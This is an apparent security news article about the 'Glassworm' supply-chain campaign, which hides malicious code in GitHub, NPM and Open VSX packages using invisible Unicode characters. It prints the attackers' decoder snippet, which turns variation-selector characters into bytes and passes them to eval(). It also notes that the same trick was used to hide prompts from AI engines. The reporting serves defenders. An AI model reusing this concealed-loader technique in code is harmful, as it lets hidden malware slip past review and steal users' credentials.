Supply-chain attack uses invisible Unicode code to bypass detection

Security researchers from Aikido Security discovered a supply-chain attack using invisible Unicode code to conceal malicious functions in packages uploaded to GitHub, NPM, and Open VSX. The attack group, dubbed Glassworm, uploaded 151 malicious packages to GitHub from March 3 to March 9, 2026.
How the invisible code works
The malicious packages use Unicode characters from Public Use Areas (also called Public Use Access) that are invisible when viewed in editors, terminals, and code review interfaces. While most of the code appears normal, malicious functions and payloads are rendered using these invisible characters, making manual code reviews and traditional defenses ineffective.
The invisible Unicode characters represent every letter of the US alphabet when processed by computers but display as whitespace or blank lines to humans. JavaScript interpreters can read and execute these characters as normal code.
Technical implementation
In one analyzed package, attackers encoded a malicious payload using invisible characters. The code includes a decoder function that extracts the hidden bytes and passes them to eval():
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
The backtick string passed to s() appears empty in viewers but contains invisible characters that decode to a full malicious payload. In previous incidents, decoded payloads fetched and executed second-stage scripts using Solana as a delivery channel to steal tokens, credentials, and secrets.
Attack characteristics
The malicious packages are particularly difficult to detect because:
- The visible portions of the code are high quality and realistic
- Surrounding changes include documentation tweaks, version bumps, small refactors, and bug fixes
- Changes are stylistically consistent with target projects
- Researchers suspect LLMs are used to generate convincingly legitimate packages
This Unicode technique was first used in 2024 to conceal malicious prompts fed to AI engines, and has since been adapted for traditional malware attacks. The 151 packages detected likely represent a small fraction of the campaign, as many have been deleted since initial upload.
📖 Read the full source: HN AI Agents
👀 See Also

Trojan found in Claude Flow repository skill.md files
A GitHub repository containing Claude Flow skill files was found to contain a Trojan identified as JS/CrypoStealz.AE!MTB. The malware triggered automatically when an AI-based IDE opened the folder to read the markdown files.

Security vulnerabilities exposed in Lovable-showcased EdTech app
A security researcher found 16 vulnerabilities in a Lovable-showcased EdTech app, including critical auth logic flaws that exposed 18,697 user records without authentication. The app had 100K+ views on Lovable's showcase and real users from UC Berkeley, UC Davis, and schools worldwide.

Declawed: An Advanced Community-Driven Malware Scanner for ClawHub SKILL.md Files
Declawed is a security tool for scanning SKILL.md files on ClawHub, detecting prompt injection, malicious content, and info stealers, utilizing community-driven rulesets.

Open Source AI Tools Pose Security Risks Through 'Illusory Security Through Transparency'
A Reddit post warns about malware disguised as open-source AI agents and tools, where malicious code can be hidden in large codebases that users assume are safe because they're on GitHub. The post describes how 'vibe-coding' and autonomous AI agents condition users to run unknown programs without review.